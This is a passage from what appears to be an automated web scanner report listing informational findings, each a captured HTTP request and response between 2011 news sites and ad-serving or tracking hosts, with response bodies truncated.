Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:29:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 376

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3a
...[SNIP]...
16.7. http://ad.doubleclick.net/adi/wn.loc.wcax/news-ap-national  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news-ap-national

Request

GET /adi/wn.loc.wcax/news-ap-national;sz=94x19;wnsz=88;tile=1;wncc=News%20-%20AP-National;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=[page.rand]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:29:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 376

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3a
...[SNIP]...
16.8. http://ad.doubleclick.net/adi/wn.loc.wcax/news-ap-state  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news-ap-state

Request

GET /adi/wn.loc.wcax/news-ap-state;sz=94x19;wnsz=88;tile=10;wncc=News%20-%20AP-State;wnpt=C;wnpc=category;wncp=WCAX;wncid=18197;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_188169=wcax;wnad88_50966=wcax;wnad88_50910=wcax;wnad49=wcax;apptype=platform;env=production;ord=19818295? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 376

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3a
...[SNIP]...
16.9. http://ad.doubleclick.net/adi/wn.loc.wcax/political  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/political

Request

GET /adi/wn.loc.wcax/political;sz=300x250;wnsz=52;tile=5;wncc=Political;wnpt=S;wnpc=story;wncp=WCAX;wncid=503137;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=99140980? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:35:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3327

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 13713 Template Name = TEST WorldNow Flash I
...[SNIP]...
16.10. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/promotion1

Request

GET /adi/wn.loc.wcax/promotion1;sz=728x90;wnsz=41;tile=3;wncc=Promotion%201;wnpt=S;wnpc=story;wncp=WCAX;wncid=452989;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=87321408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 13:16:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 634

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script>
var gfEbForceStreaming = 1;

</script>
<script src=
...[SNIP]...
16.11. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/sales-lifestyle

Request

GET /adi/wn.loc.wcax/sales-lifestyle;sz=728x90;wnsz=46;tile=3;wncc=Sales%20-%20Lifestyle;wnpt=C;wnpc=category;wncp=WCAX;wncid=68446;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_13544=ap;wnad49=wcax;apptype=platform;env=production;ord=81412589? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 625

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
16.12. http://ad.doubleclick.net/adi/wn.loc.wcax/weather  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/weather

Request

GET /adi/wn.loc.wcax/weather;sz=468x60;wnsz=1;tile=6;wncc=Weather;wnpt=C;wnpc=weather;wncp=WCAX;wncid=18196;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=79347955? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:30:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 560

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
16.13. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?1DcIAFDHGQAvoogAAAAAAGK2IgAAAAAAAgAAAAQAAAAAAP8AAAAHCIuDLQAAAAAAAIEtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABE1BAAAAAAAAIAAgAAAAAAgpVDi2xn8z8AAAAAAAASQK0cWmQ73.k.AAAAAAAAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADRnzl3IDfpCeJpp1AiFaPPhSvxg1SnbSzUHg-6AAAAAA==,http%3A%2F%2Fr.turn.com%2Fr%2Fformclick%2Fid%2FJ81uPvGhVn72wQgAAQIBAA%2Furl%2F%24,http%3A%2F%2Fwww.wcax.com%2Fglobal%2Fstory.asp%3Fs%3D503137,Z%3D468x60%26x%3Dhttp%253A%252F%252Fr%252Eturn%252Ecom%252Fr%252Fformclick%252Fid%252FJ81uPvGhVn72wQgAAQIBAA%252Furl%252F%2524%26s%3D1689424%26_salt%3D2792101757%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%26r%3D1,e2f6df20-62a5-11e0-a636-00304862d97c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; ih="b!!!!$!/cM[!!!!#<uB1*!0Qau!!!!#<tePk"; pv1="b!!!!$!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~"; bh="b!!!!r!!-O3!!!!$<uFx5!!/xg!!!!#<uFx5!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!%<uFx5!!j,.!!<NC<td)Q!!vJ=!!!!#<uFx5!!vpb!!!!#<tdei!!xxe!!!!#<tdei!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#0')!!!!#<tdei!#1*j!!!!#<uFx5!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pv!!!!#<u]Bd!#3pw!!!!#<u7R!!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#Km-!!!!#<u7R!!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Z8E!!!!$<uFx5!#Z`$!!!!#<uFx5!#Zea!!!!#<uFx5!#`U,!!!!#<uFx5!#`U/!!!!#<uFx5!#`U4!!!!#<uFx5!#`U9!!!!#<uFx5!#`_p!!!!#<tdei!#aH+!!!!#<u]Bd!#c%+!!!!#<u7R!!#eRM!!!!#<tdei!#fBj!!!!$<uFx5!#fBk!!!!$<uFx5!#fBm!!!!$<uFx5!#fBn!!!!$<uFx5!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#gb%!!!!#<uFx5!#gu2!!!!#<tePk!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!%<uFx5!#uR7!!!!$<uFx5!#uR:!!!!%<uFx5!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#xu[!!!!#<u]Bd!$#r<!!!!#<td)R!$'(]!!!!#<u]Bd"; BX=265jgc96pflsl&b=4&s=b9&t=92

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:44 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0044.rm.ac4
Set-Cookie: ih="b!!!!%!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1UC(!!!!#<u]FZ"; path=/; expires=Mon, 08-Apr-2013 12:35:44 GMT
Set-Cookie: vuday1=j5M]9!>zo]2r<p+; path=/; expires=Sun, 10-Apr-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; path=/; expires=Mon, 08-Apr-2013 12:35:44 GMT
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 09 Apr 2011 12:35:44 GMT
Pragma: no-cache
Content-Length: 921
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8954415);}
</script><iframe src="htt
...[SNIP]...
16.14. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-5&r=0.8330807760357857&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 8673
Set-Cookie:PRID=337572AE-A012-4FFC-8DD1-6EAB82E26D53; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRbu=EoHuWaH2p;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRvt=CBJBaEoHuWaH2pAIJBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=7BA00400-6896-A97D-0309-05A002090101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|EzpE:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|Fy8z:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EzpEFy8z:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...
16.15. http://adserver.veruta.com/cookiematch.fcgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 11 Apr 2011 16:31:18 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 146

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=567&external_user_id=0&expiration=1305131478"/>');
16.16. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 4:27:58 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 525
Date: Mon, 11 Apr 2011 16:21:22 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.1
...[SNIP]...
16.17. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Request

GET /adscgen/st.php?survey_num=880609&site=54787049&code=38651720&randnum=531339 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-14-2; ES=724925-!f8"M-ac

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:22 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 1
Content-Type: text/html

;
16.18. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2326412&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/wn.loc.wcax/news;sz=728x90;wnsz=41;tile=3;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408230;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=26798968?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=73786992-c1ac-4ae0-ab08-95828826c2953Hu01g; A3=iVGCazDb02Hn00002h6GXaxsD0czK00000idb7axqo02Hn00000iryraz5F09Fl0000aidb8axqo02Hn00000h6H6axsD0czK00000izcpayfZ0bnA00001iGeHaztg0bBg00001hZiFayN607xf00000hRzPazYC07tg00001iVEMazDb02Hn00001iVF7aztg02Hn00001iKJmayXi07Nz00001ieWcaxuC035P00000hGtnaxCA0bKd00001gy4faxT809wy0000ki9lAaxCA0bKd00003hRzOazYy07tg00001iznKax6T0bI400001iRc1az5S0cba00001hUeBaxLG0cdw00001iBoWax1n06UE00001iGxeaxBP07pd00001i9lUaxwP0bKd00001htT2ax2d07aw00001iwN7az7I0czK0000chVoJawTt0bKd00004hUeyaxqd0cdw00001imVBayg20cEt00001b2Xeayce04m400000hGteaxw50bKd00001hVo4axCA0bKd00003hGtDaxxL0bKd00005iBlzaxwY06UE00001iwZ+azjI0czK00005gx4UayXj09wy00002gy4daxKP09wy00002ipIYayg10cEt00001iB.Uaxqo02Hn00005iznWax7U0bI400001; B3=97pN0000000001t.8Tjz0000000000tX8KY10000000000t.8dnC0000000002u28P920000000001tV8HLo0000000005tY8Qvs0000000003tY95u+0000000001tU6Yf50000000001tU8Jbw0000000004tV93Np0000000001tW8Swk0000000005tX8nf80000000000tX8B100000000001tY9ajg0000000001u08nf90000000000tX8ZIR0000000002tV8V.x0000000001tZ92de0000000002tW8Jbt0000000003tY8QDY0000000001u193Nl0000000001tX8SBq0000000001tZ8B0.0000000001tX8TZe000000000au09br40000000001u19br30000000001u15J3v0000000000tZ8Qvv0000000001tX8B120000000005tX9br20000000002u184hv0000000002t.8Ykb0000000001tZ8WhH0000000001tV9c2I000000000hu086Y60000000001tW8Swi0000000000tX95uB0000000001tX8Swj0000000000tX851k000000000mtY

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=idb7axqo02Hn00000h6GXaxsD0czK00000iVGCazDb02Hn00002iryraz5F09Fl0000aiGeHaztg0bBg00001izcpayfZ0bnA00001h6H6axsD0czK00000idb8axqo02Hn00000hZiFayN607xf00000hGtnaxCA0bKd00001ieWcaxuC035P00000iKJmayXi07Nz00001iVF7aztg02Hn00001iVEMazDb02Hn00001hRzPazYC07tg00001hRzOazYy07tg00001i9lAaxCA0bKd00003gy4faxT809wy0000kiznKax6T0bI400001iBoWax1n06UE00001hUeBaxLG0cdw00001iRc1az5S0cba00001htT2ax2d07aw00001i9lUaxwP0bKd00001iGxeaxBP07pd00001iuodaAyr09Fl00001imVBayg20cEt00001hUeyaxqd0cdw00001iwN7az7I0czK0000ciwZ+azjI0czK00005iBlzaxwY06UE00001hGtDaxxL0bKd00005hVo4axCA0bKd00003hGteaxw50bKd00001b2Xeayce04m400000gy4daxKP09wy00002gx4UayXj09wy00002ipIYayg10cEt00001iB.Uaxqo02Hn00005iznWax7U0bI400001; expires=Fri, 08-Jul-2011 08:59:31 GMT; domain=.serving-sys.com; path=/
